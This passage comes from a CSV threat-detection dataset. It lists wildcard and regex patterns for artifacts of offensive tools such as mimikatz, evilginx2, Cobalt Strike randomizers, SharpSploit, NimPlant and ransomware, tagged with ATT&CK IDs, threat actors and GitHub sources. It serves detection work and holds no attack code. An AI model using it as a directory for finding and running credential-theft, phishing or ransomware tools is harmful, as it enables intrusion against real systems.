TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4679" "*.jpg.exe*",".{0,1000}\.jpg\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4680" 
"*.jpg.iso*",".{0,1000}\.jpg\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4681" "*.jpg.jasmin*",".{0,1000}\.jpg\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4682" "*.kb.123456.*",".{0,1000}\.kb\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker 
- Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4683" "*.kerberoast.txt*",".{0,1000}\.kerberoast\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","N/A","3","226","31","2024-09-23T18:11:26Z","2022-12-30T23:35:40Z","4684" "*.kirbi *",".{0,1000}\.kirbi\s.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","4685" "*.lab.evilginx.com*",".{0,1000}\.lab\.evilginx\.com.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","4687" "*.LateralMovement.PowerShellRemoting*",".{0,1000}\.LateralMovement\.PowerShellRemoting.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - 
T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4688" "*.LateralMovement.SCM.*",".{0,1000}\.LateralMovement\.SCM\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4689" "*.LateralMovement.WMI.WMIExecute(*",".{0,1000}\.LateralMovement\.WMI\.WMIExecute\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4690" "*.ldapdump.txt*",".{0,1000}\.ldapdump\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","N/A","3","226","31","2024-09-23T18:11:26Z","2022-12-30T23:35:40Z","4691" 
"*.link/links/windows/target/x86_64-pc-windows-gnu/release/link.exe*",".{0,1000}\.link\/links\/windows\/target\/x86_64\-pc\-windows\-gnu\/release\/link\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","4692" "*.lists.123456.*",".{0,1000}\.lists\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - 
Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4693" "*.live.123456.*",".{0,1000}\.live\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4694" "*.local.kirbi*",".{0,1000}\.local\.kirbi.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","4695" "*.m.123456.*",".{0,1000}\.m\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - 
TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4698" "*.mail.123456.*",".{0,1000}\.mail\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4699" "*.media.123456.*",".{0,1000}\.media\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4700" 
"*.mobile.123456.*",".{0,1000}\.mobile\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4702" "*.mysql.123456.*",".{0,1000}\.mysql\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based 
detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4706" "*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation *",".{0,1000}\.NET\spost\-exploitation\stoolkit\sfor\sActive\sDirectory\sreconnaissance\sand\sexploitation\s.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - 
TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","0","#content","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","4707" "*.news.123456.*",".{0,1000}\.news\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4708" 
"*.nimplant*",".{0,1000}\.nimplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","4710" "*.O365.GroupMembership_AdminGroups.txt*",".{0,1000}\.O365\.GroupMembership_AdminGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4711" "*.O365.GroupMembership_VPNGroups.txt*",".{0,1000}\.O365\.GroupMembership_VPNGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4712" "*.O365.Roles_Admins.txt*",".{0,1000}\.O365\.Roles_Admins\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4713" "*.O365.Users_Detailed.csv*",".{0,1000}\.O365\.Users_Detailed\.csv.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4714" "*.O365.Users_LDAP_details.txt*",".{0,1000}\.O365\.Users_LDAP_details\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4715" "*.O365.Users_ProxyAddresses.txt*",".{0,1000}\.O365\.Users_ProxyAddresses\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4716" "*.onion/chat.html?*",".{0,1000}\.onion\/chat\.html\?.{0,1000}","offensive_tool_keyword","SunCrypt","SunCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","4717" "*.onion:31337*",".{0,1000}\.onion\:31337.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","4718" "*.onion:8000*",".{0,1000}\.onion\:8000.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense 
